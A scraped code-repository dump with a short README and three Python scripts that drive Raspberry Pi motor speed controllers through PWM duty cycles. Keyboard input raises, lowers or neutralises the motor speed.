"license_type": "no_license", "max_line_length": 17, "num_lines": 2, "path": "/README.md", "repo_name": "kristenkoyanagi/ConfigureESC", "src_encoding": "UTF-8", "text": "# Motor Test\n# Motor-ESC-Tests\n" }, { "alpha_fraction": 0.44863012433052063, "alphanum_fraction": 0.5082191824913025, "avg_line_length": 23.25, "blob_id": "e48298af6b4122000f59b37b2d5f661c80aa4b12", "content_id": "3c26de61e80d5b3bbf37cceca72cacb9a36b56ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1460, "license_type": "no_license", "max_line_length": 63, "num_lines": 60, "path": "/MotorTest2.py", "repo_name": "kristenkoyanagi/ConfigureESC", "src_encoding": "UTF-8", "text": "import time\nimport RPi.GPIO as GPIO\nimport pigpio\nimport RPIO\n\n\ndef MotorTest(pin1, pin2):\n\n #pin must be 12, 13, 18, or 19\n\n running = True\n\n Frequency = 50\n \n MaxSpeed = 0.2*Frequency\n MinSpeed = 0.1*Frequency\n Neutral = 0.15*Frequency\n \n speed1 = Neutral\n speed2 = Neutral\n\n pi = pigpio.pi()\n pi.hardware_PWM(pin1, Frequency, speed1*10000)\n pi.hardware_PWM(pin2, Frequency, speed2*10000)\n\n \n while(running):\n ctrl = raw_input(\"w: speed up. s: slow down. q:quit\")\n if(ctrl==\"w\"):\n speed1 = speed1+0.5\n speed2 = speed2+0.5\n elif(ctrl==\"s\"):\n speed1 = speed1-0.5\n speed2 = speed2-0.5\n elif(ctrl==\"q\"):\n speed1 = 0\n speed2 = 0\n running = False\n elif(ctrl==\"max\"):\n speed1 = MaxSpeed\n speed2 = MaxSpeed\n elif(ctrl==\"min\"):\n speed1 = MinSpeed\n speed2 = MinSpeed\n elif(ctrl==\"n\"):\n speed1 = Neutral\n speed2 = Neutral\n elif(ctrl==\"a\"):\n speed1 = speed1 + 0.25\n elif(ctrl==\"d\"):\n speed2 = speed2 + 0.25\n\n# if(speed>MaxSpeed):\n# speed = MaxSpeed\n## elif(speed<MinSpeed):\n## speed = MinSpeed\n \n print(speed1, speed2)\n pi.hardware_PWM(pin1, Frequency, speed1*10000) \n pi.hardware_PWM(pin2, Frequency, speed2*10000) \n \n\n\n" }, { "alpha_fraction": 0.5197934508323669, "alphanum_fraction": 0.5765920877456665, "avg_line_length": 21.038461685180664, "blob_id": "f5f0447db1e3b1f80e7e17f73dd1643fc792a227", "content_id": "274d78218828d8e714d50a9fa8a4ae811dcc4c63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 581, "license_type": "no_license", "max_line_length": 68, "num_lines": 26, "path": "/CharacterizeMotor.py", "repo_name": "kristenkoyanagi/ConfigureESC", "src_encoding": "UTF-8", "text": "import pigpio\nimport time\n\ndef CharacterizeMotor(pin):\n\n Frequency = 50\n \n MaxSpeed = 0.2*Frequency\n MinSpeed = 0.1*Frequency\n Neutral = 0.15*Frequency\n \n speed = 7.7\n\n pi = pigpio.pi()\n pi.hardware_PWM(pin, Frequency, speed*10000)\n\n ctrl = raw_input(\"Press enter to continue\")\n\n for i in range(0,100,1):\n speed = speed + 0.01\n pi.hardware_PWM(pin, Frequency, speed*10000)\n t = speed*0.2\n print(\"Duty Cycle: \" + str(speed) + \"% Time: \" + str(t))\n time.sleep(5)\n\n pi.hardware_PWM(pin, Frequency, 0)\n\n\n \n\n" }, { "alpha_fraction": 0.5620728731155396, "alphanum_fraction": 0.5820045471191406, "avg_line_length": 25.876922607421875, "blob_id": "ec394360441c2cd132e049393de71e3e22b9f01b", "content_id": "41bb0f268fe45bef34eb9cb4fedf8f29396d43f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1756, "license_type": "no_license", "max_line_length": 82, "num_lines": 65, "path": "/MotorControl.py", "repo_name": "kristenkoyanagi/ConfigureESC", "src_encoding": "UTF-8", "text": "import time\nimport RPi.GPIO as GPIO\n\ndef MotorControl(pin1, pin2):\n \n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n GPIO.setup(pin1, GPIO.OUT)\n GPIO.setup(pin2, GPIO.OUT)\n \n running = True\n\n Frequency = 20\n MaxSpeed = 0.2*Frequency\n MinSpeed = 0.1*Frequency\n Neutral = 0.15*Frequency\n \n LeftSpeed = Neutral\n RightSpeed = Neutral\n\n RightMotor = GPIO.PWM(pin1, Frequency) \n RightMotor.start(0)\n LeftMotor = GPIO.PWM(pin2, Frequency)\n LeftMotor.start(0)\n\n RightMotor.ChangeDutyCycle(LeftSpeed)\n LeftMotor.ChangeDutyCycle(RightSpeed)\n\n ctrl = input(\"After ESC startup, press any key to continue.\")\n\n LeftSpeed = Neutral\n RightSpeed = Neutral\n RightMotor.ChangeDutyCycle(RightSpeed)\n LeftMotor.ChangeDutyCycle(LeftSpeed)\n \n while(running):\n ctrl = input(\"Use ASDW to navigate.\")\n if(ctrl == \"a\"):\n LeftSpeed = LeftSpeed + 0.25\n elif(ctrl == \"s\"):\n LeftSpeed = LeftSpeed - 0.25\n RightSpeed= RightSpeed - 0.25\n elif(ctrl == \"d\"):\n RightSpeed = RightSpeed + 0.25\n elif(ctrl == \"w\"):\n RightSpeed = RightSpeed + 0.25\n LeftSpeed = LeftSpeed + 0.25\n elif(ctrl == \"max\"):\n LeftSpeed = MaxSpeed\n RightSpeed = MaxSpeed\n elif(ctrl == \"n\"):\n LeftSpeed = Neutral\n RightSpeed = Neutral\n elif(ctrl == \"min\"):\n LeftSpeed = MinSpeed\n RightSpeed = MinSpeed\n elif(ctrl ==\"q\"):\n running = False\n\n RightMotor.ChangeDutyCycle(RightSpeed)\n LeftMotor.ChangeDutyCycle(LeftSpeed)\n\n\n \n print(\"LeftSpeed = \" + str(LeftSpeed) + \"RightSpeed = \" + str(RightSpeed))\n \n" } ]
5
hugovk/pika
https://github.com/hugovk/pika
bcf215428c15ea8a5555d1e3cd15d3ce7a9b9403
03542ef616a2a849e8bfb0845427f50e741ea0c6
c02157afcb4c65506f04de0548df74af1a2e10a5
refs/heads/master
2020-03-21T18:23:57.266981
2018-06-25T18:54:45
2018-06-25T18:54:45
138,889,211
0
0
BSD-3-Clause
2018-06-27T13:58:59
2018-06-26T19:36:43
2018-06-25T18:54:51
null
[ { "alpha_fraction": 0.5944910049438477, "alphanum_fraction": 0.595207691192627, "avg_line_length": 34.85810089111328, "blob_id": "4ed86dd22245aa042d90eaabda0ada55ed4c9c63", "content_id": "2228b43eda2d78788321c97f377dddb19cc73a0d", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32093, "license_type": "permissive", "max_line_length": 88, "num_lines": 895, "path": "/pika/adapters/twisted_connection.py", "repo_name": "hugovk/pika", "src_encoding": "UTF-8", "text": "\"\"\"Using Pika with a Twisted reactor.\n\nSupports two methods of establishing the connection, using TwistedConnection\nor TwistedProtocolConnection. For details about each method, see the docstrings\nof the corresponding classes.\n\nThe interfaces in this module are Deferred-based when possible. This means that\nthe connection.channel() method and most of the channel methods return\nDeferreds instead of taking a callback argument and that basic_consume()\nreturns a Twisted DeferredQueue where messages from the server will be\nstored. Refer to the docstrings for TwistedConnection.channel() and the\nTwistedChannel class for details.\n\n\"\"\"\n\nimport functools\nimport logging\nimport socket\n\nfrom zope.interface import implementer\nfrom twisted.internet.interfaces import (IReadWriteDescriptor,\n IHalfCloseableDescriptor)\nfrom twisted.internet import (defer, error as twisted_error, reactor,\n threads as twisted_threads)\nimport twisted.python.failure\n\nimport pika.connection\nfrom pika import exceptions\nfrom pika.adapters import base_connection\nfrom pika.adapters.utils import nbio_interface, io_services_utils\nfrom pika.adapters.utils.io_services_utils import (check_callback_arg,\n check_fd_arg)\n\n# Twistisms\n# pylint: disable=C0111,C0103\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass ClosableDeferredQueue(defer.DeferredQueue):\n \"\"\"\n Like the normal Twisted DeferredQueue, but after close() is called with an\n exception instance all pending Deferreds are errbacked and further attempts\n to call get() or put() return a Failure wrapping that exception.\n \"\"\"\n\n def __init__(self, size=None, backlog=None):\n self.closed = None\n super(ClosableDeferredQueue, self).__init__(size, backlog)\n\n def put(self, obj):\n if self.closed:\n return defer.fail(self.closed)\n return defer.DeferredQueue.put(self, obj)\n\n def get(self):\n if self.closed:\n return defer.fail(self.closed)\n return defer.DeferredQueue.get(self)\n\n def close(self, reason):\n self.closed = reason\n while self.waiting:\n self.waiting.pop().errback(reason)\n self.pending = []\n\n\nclass TwistedChannel(object):\n \"\"\"A wrapper around Pika's Channel.\n\n Channel methods that normally take a callback argument are wrapped to\n return a Deferred that fires with whatever would be passed to the callback.\n If the channel gets closed, all pending Deferreds are errbacked with a\n ChannelClosed exception. The returned Deferreds fire with whatever\n arguments the callback to the original method would receive.\n\n The basic_consume method is wrapped in a special way, see its docstring for\n details.\n \"\"\"\n\n WRAPPED_METHODS = ('exchange_declare', 'exchange_delete', 'queue_declare',\n 'queue_bind', 'queue_purge', 'queue_unbind', 'basic_qos',\n 'basic_get', 'basic_recover', 'tx_select', 'tx_commit',\n 'tx_rollback', 'flow', 'basic_cancel')\n\n def __init__(self, channel):\n self.__channel = channel\n self.__closed = None\n self.__calls = set()\n self.__consumers = {}\n\n channel.add_on_close_callback(self.channel_closed)\n\n def channel_closed(self, _channel, reason):\n # enter the closed state\n self.__closed = reason\n # errback all pending calls\n for d in self.__calls:\n d.errback(self.__closed)\n # close all open queues\n for consumers in self.__consumers.values():\n for c in consumers:\n c.close(self.__closed)\n # release references to stored objects\n self.__calls = set()\n self.__consumers = {}\n\n def basic_consume(self, *args, **kwargs):\n \"\"\"Consume from a server queue. Returns a Deferred that fires with a\n tuple: (queue_object, consumer_tag). The queue object is an instance of\n ClosableDeferredQueue, where data received from the queue will be\n stored. Clients should use its get() method to fetch individual\n message.\n \"\"\"\n if self.__closed:\n return defer.fail(self.__closed)\n\n queue = ClosableDeferredQueue()\n queue_name = kwargs['queue']\n kwargs['callback'] = lambda *args: queue.put(args)\n self.__consumers.setdefault(queue_name, set()).add(queue)\n\n try:\n consumer_tag = self.__channel.basic_consume(*args, **kwargs)\n # TODO this except without types would suppress system-exiting\n # exceptions, such as SystemExit and KeyboardInterrupt. It should be at\n # least `except Exception` and preferably more specific.\n except:\n return defer.fail()\n\n return defer.succeed((queue, consumer_tag))\n\n def queue_delete(self, *args, **kwargs):\n \"\"\"Wraps the method the same way all the others are wrapped, but removes\n the reference to the queue object after it gets deleted on the server.\n\n \"\"\"\n wrapped = self.__wrap_channel_method('queue_delete')\n queue_name = kwargs['queue']\n\n d = wrapped(*args, **kwargs)\n return d.addCallback(self.__clear_consumer, queue_name)\n\n def basic_publish(self, *args, **kwargs):\n \"\"\"Make sure the channel is not closed and then publish. Return a\n Deferred that fires with the result of the channel's basic_publish.\n\n \"\"\"\n if self.__closed:\n return defer.fail(self.__closed)\n return defer.succeed(self.__channel.basic_publish(*args, **kwargs))\n\n def __wrap_channel_method(self, name):\n \"\"\"Wrap Pika's Channel method to make it return a Deferred that fires\n when the method completes and errbacks if the channel gets closed. If\n the original method's callback would receive more than one argument, the\n Deferred fires with a tuple of argument values.\n\n \"\"\"\n method = getattr(self.__channel, name)\n\n @functools.wraps(method)\n def wrapped(*args, **kwargs):\n if self.__closed:\n return defer.fail(self.__closed)\n\n d = defer.Deferred()\n self.__calls.add(d)\n d.addCallback(self.__clear_call, d)\n\n def single_argument(*args):\n \"\"\"\n Make sure that the deferred is called with a single argument.\n In case the original callback fires with more than one, convert\n to a tuple.\n \"\"\"\n if len(args) > 1:\n d.callback(tuple(args))\n else:\n d.callback(*args)\n\n kwargs['callback'] = single_argument\n\n try:\n method(*args, **kwargs)\n # TODO this except without types would suppress system-exiting\n # exceptions, such as SystemExit and KeyboardInterrupt. It should be\n # at least `except Exception` and preferably more specific.\n except:\n return defer.fail()\n return d\n\n return wrapped\n\n def __clear_consumer(self, ret, queue_name):\n self.__consumers.pop(queue_name, None)\n return ret\n\n def __clear_call(self, ret, d):\n self.__calls.discard(d)\n return ret\n\n def __getattr__(self, name):\n # Wrap methods defined in WRAPPED_METHODS, forward the rest of accesses\n # to the channel.\n if name in self.WRAPPED_METHODS:\n return self.__wrap_channel_method(name)\n return getattr(self.__channel, name)\n\n\nclass TwistedConnection(base_connection.BaseConnection):\n \"\"\"A standard Pika connection adapter. You instantiate the class passing the\n connection parameters and the connected callback and when it gets called\n you can start using it.\n\n The problem is that connection establishing is done using the blocking\n socket module. For instance, if the host you are connecting to is behind a\n misconfigured firewall that just drops packets, the whole process will\n freeze until the connection timeout passes. To work around that problem,\n use TwistedProtocolConnection, but read its docstring first.\n\n \"\"\"\n\n def __init__(self,\n parameters=None,\n on_open_callback=None,\n on_open_error_callback=None,\n on_close_callback=None,\n custom_ioloop=None,\n internal_connection_workflow=True):\n \"\"\"\n :param parameters:\n :param on_open_callback:\n :param on_open_error_callback:\n :param on_close_callback:\n :param custom_ioloop:\n :param internal_connection_workflow:\n\n \"\"\"\n if isinstance(custom_ioloop, nbio_interface.AbstractIOServices):\n nbio = custom_ioloop\n else:\n nbio = _TwistedIOServicesAdapter(custom_ioloop)\n\n super(TwistedConnection, self).__init__(\n parameters=parameters,\n on_open_callback=on_open_callback,\n on_open_error_callback=on_open_error_callback,\n on_close_callback=on_close_callback,\n nbio=nbio,\n internal_connection_workflow=internal_connection_workflow)\n\n @classmethod\n def create_connection(cls,\n connection_configs,\n on_done,\n custom_ioloop=None,\n workflow=None):\n \"\"\"Implement\n :py:classmethod:`pika.adapters.BaseConnection.create_connection()`.\n\n \"\"\"\n nbio = _TwistedIOServicesAdapter(custom_ioloop)\n\n def connection_factory(params):\n \"\"\"Connection factory.\"\"\"\n if params is None:\n raise ValueError('Expected pika.connection.Parameters '\n 'instance, but got None in params arg.')\n return cls(\n parameters=params,\n custom_ioloop=nbio,\n internal_connection_workflow=False)\n\n return cls._start_connection_workflow(\n connection_configs=connection_configs,\n connection_factory=connection_factory,\n nbio=nbio,\n workflow=workflow,\n on_done=on_done)\n\n def channel(self, channel_number=None):\n \"\"\"Return a Deferred that fires with an instance of a wrapper around the\n Pika Channel class.\n\n \"\"\"\n d = defer.Deferred()\n super(TwistedConnection, self).channel(channel_number, d.callback)\n return d.addCallback(TwistedChannel)\n\n\nclass TwistedProtocolConnection(pika.connection.Connection):\n \"\"\"A hybrid between a Pika Connection and a Twisted Protocol. Allows using\n Twisted's non-blocking connectTCP/connectSSL methods for connecting to the\n server.\n\n It has one caveat: TwistedProtocolConnection objects have a ready\n instance variable that's a Deferred which fires when the connection is\n ready to be used (the initial AMQP handshaking has been done). You *have*\n to wait for this Deferred to fire before requesting a channel.\n\n Since it's Twisted handling connection establishing it does not accept\n connect callbacks, you have to implement that within Twisted. Also remember\n that the host, port and ssl values of the connection parameters are ignored\n because, yet again, it's Twisted who manages the connection.\n\n NOTE: since `base_connection.BaseConnection`'s primary responsibility is\n management of the transport, we use `pika.connection.Connection` directly as\n our base class because this adapter uses a different transport management\n strategy.\n\n \"\"\"\n def __init__(self,\n parameters=None,\n on_close_callback=None,\n custom_reactor=None):\n\n super(TwistedProtocolConnection, self).__init__(\n parameters=parameters,\n on_open_callback=self.connectionReady,\n on_open_error_callback=self.connectionFailed,\n on_close_callback=on_close_callback,\n internal_connection_workflow=False)\n\n self.ready = defer.Deferred()\n self._reactor = custom_reactor or reactor\n self._transport = None # to be provided by `makeConnection()`\n\n def channel(self, channel_number=None):\n \"\"\"Create a new channel with the next available channel number or pass\n in a channel number to use. Must be non-zero if you would like to\n specify but it is recommended that you let Pika manage the channel\n numbers.\n\n Return a Deferred that fires with an instance of a wrapper around the\n Pika Channel class.\n\n :param int channel_number: The channel number to use, defaults to the\n next available.\n\n \"\"\"\n d = defer.Deferred()\n super(TwistedProtocolConnection, self).channel(channel_number,\n d.callback)\n return d.addCallback(TwistedChannel)\n\n\n def _adapter_add_timeout(self, deadline, callback):\n \"\"\"Implement\n :py:meth:`pika.connection.Connection._adapter_add_timeout()`.\n\n \"\"\"\n check_callback_arg(callback, 'callback')\n return _TimerHandle(self._reactor.callLater(deadline, callback))\n\n def _adapter_remove_timeout(self, timeout_id):\n \"\"\"Implement\n :py:meth:`pika.connection.Connection._adapter_remove_timeout()`.\n\n \"\"\"\n timeout_id.cancel()\n\n def _adapter_add_callback_threadsafe(self, callback):\n \"\"\"Implement\n :py:meth:`pika.connection.Connection._adapter_add_callback_threadsafe()`.\n\n \"\"\"\n check_callback_arg(callback, 'callback')\n self._reactor.callFromThread(callback)\n\n def _adapter_connect_stream(self):\n \"\"\"Implement pure virtual\n :py:ref:meth:`pika.connection.Connection._adapter_connect_stream()`\n method.\n\n NOTE: This should not be called due to our initialization of Connection\n via `internal_connection_workflow=False`\n \"\"\"\n raise NotImplementedError\n\n def _adapter_disconnect_stream(self):\n \"\"\"Implement pure virtual\n :py:ref:meth:`pika.connection.Connection._adapter_disconnect_stream()`\n method.\n\n \"\"\"\n self._transport.abort()\n\n def _adapter_emit_data(self, data):\n \"\"\"Implement pure virtual\n :py:ref:meth:`pika.connection.Connection._adapter_emit_data()` method.\n\n \"\"\"\n self._transport.write(data)\n\n def _adapter_get_write_buffer_size(self):\n \"\"\"Implement pure virtual\n :py:ref:meth:`pika.connection.Connection._adapter_emit_data()` method.\n\n TODO: this method only belongs in SelectConnection, none others needs it\n and twisted transport doesn't expose it.\n \"\"\"\n raise NotImplementedError\n\n # IProtocol methods\n\n def dataReceived(self, data):\n # Pass the bytes to Pika for parsing\n self._on_data_available(data)\n\n def connectionLost(self, reason):\n self._transport = None\n\n # Let the caller know there's been an error\n d, self.ready = self.ready, None\n if d:\n d.errback(reason)\n\n self._on_stream_terminated(reason)\n\n def makeConnection(self, transport):\n self._transport = transport\n self._on_stream_connected()\n self.connectionMade()\n\n def connectionMade(self):\n # Tell everyone we're connected\n pass\n\n # Our own methods\n\n def connectionReady(self, res):\n d, self.ready = self.ready, None\n if d:\n d.callback(res)\n\n def connectionFailed(self, _connection, _error_message=None):\n d, self.ready = self.ready, None\n if d:\n attempts = self.params.connection_attempts\n exc = exceptions.AMQPConnectionError(attempts)\n d.errback(exc)\n\n\nclass _TwistedIOServicesAdapter(\n io_services_utils.SocketConnectionMixin,\n io_services_utils.StreamingConnectionMixin,\n nbio_interface.AbstractIOServices,\n nbio_interface.AbstractFileDescriptorServices):\n \"\"\"Implements\n :py:class:`.utils.nbio_interface.AbstractIOServices` interface\n on top of :py:class:`twisted.internet.reactor`.\n\n NOTE:\n :py:class:`.utils.nbio_interface.AbstractFileDescriptorServices`\n interface is only required by the mixins.\n\n \"\"\"\n\n @implementer(IHalfCloseableDescriptor, IReadWriteDescriptor)\n class _SocketReadWriteDescriptor(object):\n \"\"\"File descriptor wrapper for `add/remove-Writer/Reader`. A given\n instance must represent both reader and writer, otherwise reactor\n may invoke e.g., doRead on a descriptor registered for on_writable\n callbacks, thus causing that event to be lost.\n\n \"\"\"\n\n def __init__(self, fd, on_readable=None, on_writable=None):\n\n assert on_readable is not None or on_writable is not None, (\n 'At least one of on_readable/on_writable must be non-None.')\n assert callable(on_readable) or callable(on_writable), (\n 'One or both of on_readable/on_writable must be callable.')\n\n self._fd = fd\n\n self._on_readable = on_readable\n self._on_writable = on_writable\n\n def __repr__(self):\n return '{}: fd={}, on_readable={!r}, on_writable={!r}'.format(\n self.__class__.__name__,\n self._fd,\n self._on_readable,\n self.on_writable)\n\n @property\n def on_readable(self):\n return self._on_readable\n\n @on_readable.setter\n def on_readable(self, value):\n assert callable(value) or value is None, (\n 'on_readable value must be callable or None.')\n self._on_readable = value\n\n @property\n def on_writable(self):\n return self._on_writable\n\n @on_writable.setter\n def on_writable(self, value):\n assert callable(value) or value is None, (\n 'on_writable value must be callable or None.')\n self._on_writable = value\n\n def logPrefix(self):\n return self.__class__.__name__\n\n def fileno(self):\n \"\"\"\n :raise: If the descriptor no longer has a valid file descriptor\n number associated with it.\n\n :return: The platform-specified representation of a file descriptor\n number. Or C{-1} if the descriptor no longer has a valid file\n descriptor number associated with it. As long as the descriptor\n is valid, calls to this method on a particular instance must\n return the same value.\n \"\"\"\n return self._fd\n\n def doRead(self):\n \"\"\"\n Some data is available for reading on your descriptor.\n\n @return: If an error is encountered which causes the descriptor to\n no longer be valid, a L{Failure} should be returned. Otherwise,\n L{None}.\n \"\"\"\n if self._on_readable is not None:\n try:\n self._on_readable()\n except Exception: # pylint: disable=W0703\n LOGGER.exception('Exception from user\\'s on_readable() '\n 'callback; fd=%s', self.fileno())\n return twisted.python.failure.Failure()\n else:\n LOGGER.warning('Reactor called %s.doRead() but on_readable is '\n 'None; fd=%s.', self.logPrefix(), self.fileno())\n\n return None\n\n def doWrite(self):\n \"\"\"\n Some data can be written to your descriptor.\n\n @return: If an error is encountered which causes the descriptor to\n no longer be valid, a L{Failure} should be returned. Otherwise,\n L{None}.\n \"\"\"\n if self._on_writable is not None:\n try:\n self._on_writable()\n except Exception: # pylint: disable=W0703\n LOGGER.exception('Exception from user\\'s on_writable() '\n 'callback; fd=%s', self.fileno())\n return twisted.python.failure.Failure()\n else:\n LOGGER.warning('Reactor called %s.doWrite() but on_writable is '\n 'None; fd=%s.', self.logPrefix(), self.fileno())\n\n return None\n\n def connectionLost(self, reason):\n \"\"\"\n Called when the connection is shut down.\n\n NOTE: even though we implement `IHalfCloseableDescriptor`, reactor\n still calls `connectionLost()` instead of `readConnectionLost()`\n and `writeConnectionLost()`.\n\n Clear any circular references here, and any external references\n to this Protocol. The connection has been closed. The C{reason}\n Failure wraps a L{twisted.internet.error.ConnectionDone} or\n L{twisted.internet.error.ConnectionLost} instance (or a subclass\n of one of those).\n\n @type reason: L{twisted.python.failure.Failure}\n \"\"\"\n LOGGER.error('Reactor called %s.connectionLost(%r); fd=%s.',\n self.logPrefix(), reason, self.fileno())\n\n if self._on_writable is not None:\n # Convert this to a writable event for compatibility with pika's\n # other I/O loops\n LOGGER.debug('%s: Converting connectionLost() to doWrite() for '\n 'compatibility with our other I/O loops; fd=%s',\n self.logPrefix(), self.fileno())\n self.doWrite()\n\n def readConnectionLost(self, reason):\n \"\"\"\n Indicates read connection was lost.\n \"\"\"\n LOGGER.error('Reactor called %s.readConnectionLost(%r); fd=%s.',\n self.logPrefix(), reason, self.fileno())\n return\n\n # NOTE: This appears to be unnecessary according to our async\n # services tests.\n #\n # # For compatibility with our own select/poll implementation's\n # # handling of closed input, we treat it as a readable event\n # if self._on_readable is not None:\n # self._on_readable()\n # else:\n # LOGGER.debug('Suppressing reactor\\'s call to '\n # '%s.readConnectionLost(%r) on writable '\n # 'descriptor; fd=%s.',\n # self.logPrefix(), reason, self.fileno())\n\n def writeConnectionLost(self, reason):\n \"\"\"\n Indicates write connection was lost.\n\n :param reason: A failure instance indicating the reason why the\n connection was lost. L{error.ConnectionLost} and\n L{error.ConnectionDone} are of special note, but the\n failure may be of other classes as well.\n\n \"\"\"\n LOGGER.error('Reactor called %s.writeConnectionLost(%r); fd=%s.',\n self.logPrefix(), reason, self.fileno())\n return\n\n # NOTE: This appears to be unnecessary according to our async\n # services tests.\n #\n # # For compatibility with our own select/poll implementation's\n # # handling POLLERR and similar, we treat it as a writable event\n # if self._on_writable is not None:\n # self._on_writable()\n # else:\n # LOGGER.debug('Suppressing reactor\\'s call to '\n # '%s.writeConnectionLost(%r) on readable '\n # 'descriptor; fd=%s.',\n # self.logPrefix(), reason, self.fileno())\n\n\n def __init__(self, in_reactor):\n \"\"\"\n :param None | twisted.internet.interfaces.IReactorFDSet reactor:\n\n \"\"\"\n self._reactor = in_reactor or reactor\n\n # Mapping of fd to _SocketReadWriteDescriptor\n self._fd_watchers = dict()\n\n def get_native_ioloop(self):\n \"\"\"Implement\n :py:meth:`.utils.nbio_interface.AbstractIOServices.get_native_ioloop()`.\n\n \"\"\"\n return self._reactor\n\n def close(self):\n \"\"\"Implement\n :py:meth:`.utils.nbio_interface.AbstractIOServices.close()`.\n\n \"\"\"\n # NOTE Twisted reactor doesn't seem to have an equivalent of `close()`\n # that other I/O loops have.\n pass\n\n def run(self):\n \"\"\"Implement :py:meth:`.utils.nbio_interface.AbstractIOServices.run()`.\n\n \"\"\"\n # NOTE: pika doesn't need signal handlers and installing them causes\n # exceptions in our tests that run the loop from a thread.\n self._reactor.run(installSignalHandlers=False)\n\n def stop(self):\n \"\"\"Implement :py:meth:`.utils.nbio_interface.AbstractIOServices.stop()`.\n\n \"\"\"\n self._reactor.stop()\n\n def add_callback_threadsafe(self, callback):\n \"\"\"Implement\n :py:meth:`.utils.nbio_interface.AbstractIOServices.add_callback_threadsafe()`.\n\n \"\"\"\n check_callback_arg(callback, 'callback')\n self._reactor.callFromThread(callback)\n\n def call_later(self, delay, callback):\n \"\"\"Implement\n :py:meth:`.utils.nbio_interface.AbstractIOServices.call_later()`.\n\n \"\"\"\n check_callback_arg(callback, 'callback')\n return _TimerHandle(self._reactor.callLater(delay, callback))\n\n def getaddrinfo(self, host, port, on_done, family=0, socktype=0, proto=0,\n flags=0):\n \"\"\"Implement\n :py:meth:`.utils.nbio_interface.AbstractIOServices.getaddrinfo()`.\n\n \"\"\"\n # Use thread pool to run getaddrinfo asynchronously\n return _TwistedDeferredIOReference(\n twisted_threads.deferToThreadPool(\n self._reactor, self._reactor.getThreadPool(),\n socket.getaddrinfo,\n # NOTE: python 2.x getaddrinfo only takes positional args\n host,\n port,\n family,\n socktype,\n proto,\n flags),\n on_done)\n\n def set_reader(self, fd, on_readable):\n \"\"\"Implement\n :py:meth:`.utils.nbio_interface.AbstractFileDescriptorServices.set_reader()`.\n\n \"\"\"\n LOGGER.debug('%s.set_reader(%s, %s)',\n self.__class__.__name__, fd, on_readable)\n check_fd_arg(fd)\n check_callback_arg(on_readable, 'or_readable')\n try:\n descriptor = self._fd_watchers[fd]\n except KeyError:\n descriptor = self._SocketReadWriteDescriptor(\n fd,\n on_readable=on_readable)\n self._fd_watchers[fd] = descriptor\n else:\n descriptor.on_readable = on_readable\n\n self._reactor.addReader(descriptor)\n\n def remove_reader(self, fd):\n \"\"\"Implement\n :py:meth:`.utils.nbio_interface.AbstractFileDescriptorServices.remove_reader()`.\n\n \"\"\"\n LOGGER.debug('%s.remove_reader(%s)', self.__class__.__name__, fd)\n check_fd_arg(fd)\n try:\n descriptor = self._fd_watchers[fd]\n except KeyError:\n return False\n\n if descriptor.on_readable is None:\n assert descriptor.on_writable is not None, (\n '_SocketReadWriteDescriptor was neither readable nor writable.')\n return False\n\n descriptor.on_readable = None\n\n self._reactor.removeReader(descriptor)\n\n if descriptor.on_writable is None:\n self._fd_watchers.pop(fd)\n\n return True\n\n def set_writer(self, fd, on_writable):\n \"\"\"Implement\n :py:meth:`.utils.nbio_interface.AbstractFileDescriptorServices.set_writer()`.\n\n \"\"\"\n LOGGER.debug('%s.set_writer(%s, %s)',\n self.__class__.__name__, fd, on_writable)\n check_fd_arg(fd)\n check_callback_arg(on_writable, 'on_writable')\n try:\n descriptor = self._fd_watchers[fd]\n except KeyError:\n descriptor = self._SocketReadWriteDescriptor(\n fd,\n on_writable=on_writable)\n self._fd_watchers[fd] = descriptor\n else:\n descriptor.on_writable = on_writable\n\n self._reactor.addWriter(descriptor)\n\n def remove_writer(self, fd):\n \"\"\"Implement\n :py:meth:`.utils.nbio_interface.AbstractFileDescriptorServices.remove_writer()`.\n\n \"\"\"\n LOGGER.debug('%s.remove_writer(%s)', self.__class__.__name__, fd)\n check_fd_arg(fd)\n try:\n descriptor = self._fd_watchers[fd]\n except KeyError:\n return False\n\n if descriptor.on_writable is None:\n assert descriptor.on_readable is not None, (\n '_SocketReadWriteDescriptor was neither writable nor readable.')\n return False\n\n descriptor.on_writable = None\n\n self._reactor.removeWriter(descriptor)\n\n if descriptor.on_readable is None:\n self._fd_watchers.pop(fd)\n return True\n\n\nclass _TimerHandle(nbio_interface.AbstractTimerReference):\n \"\"\"This module's adaptation of `nbio_interface.AbstractTimerReference`.\n\n \"\"\"\n\n def __init__(self, handle):\n \"\"\"\n\n :param twisted.internet.base.DelayedCall handle:\n \"\"\"\n self._handle = handle\n\n def cancel(self):\n if self._handle is not None:\n try:\n self._handle.cancel()\n except (twisted_error.AlreadyCalled,\n twisted_error.AlreadyCancelled):\n pass\n\n self._handle = None\n\n\nclass _TwistedDeferredIOReference(nbio_interface.AbstractIOReference):\n \"\"\"This module's adaptation of `nbio_interface.AbstractIOReference`\n for twisted defer.Deferred.\n\n On failure, extract the original exception from the Twisted Failure\n exception to pass to user's callback.\n\n \"\"\"\n\n def __init__(self, deferred, on_done):\n \"\"\"\n :param defer.Deferred deferred:\n :param callable on_done: user callback that takes the completion result\n or exception (check for `BaseException`) as its only arg. It will\n not be called if the operation was cancelled.\n\n \"\"\"\n check_callback_arg(on_done, 'on_done')\n\n self._deferred = deferred\n self._cancelling = False\n\n def on_done_adapter(result):\n \"\"\"Handle completion callback from the deferred instance. On\n Failure, extract the original exception from the Twisted Failure\n exception to pass to the user's callback.\n\n \"\"\"\n\n # NOTE: Twisted makes callback for cancelled deferred, but pika\n # doesn't want that\n if not self._cancelling:\n if isinstance(result, twisted.python.failure.Failure):\n LOGGER.debug(\n 'Deferred operation completed with Failure: %r',\n result)\n # Extract the original exception\n result = result.value\n on_done(result)\n\n deferred.addBoth(on_done_adapter)\n\n def cancel(self):\n \"\"\"Cancel pending operation\n\n :returns: False if was already done or cancelled; True otherwise\n\n \"\"\"\n already_processed = (\n self._deferred.called and\n not isinstance(self._deferred.result, defer.Deferred))\n\n # So that our callback wrapper will know to suppress the mandatory\n # errorback from Deferred.cancel()\n self._cancelling = True\n\n # Always call through to cancel() in case our Deferred was waiting for\n # another one to complete, so the other one would get cancelled, too\n self._deferred.cancel()\n\n return not 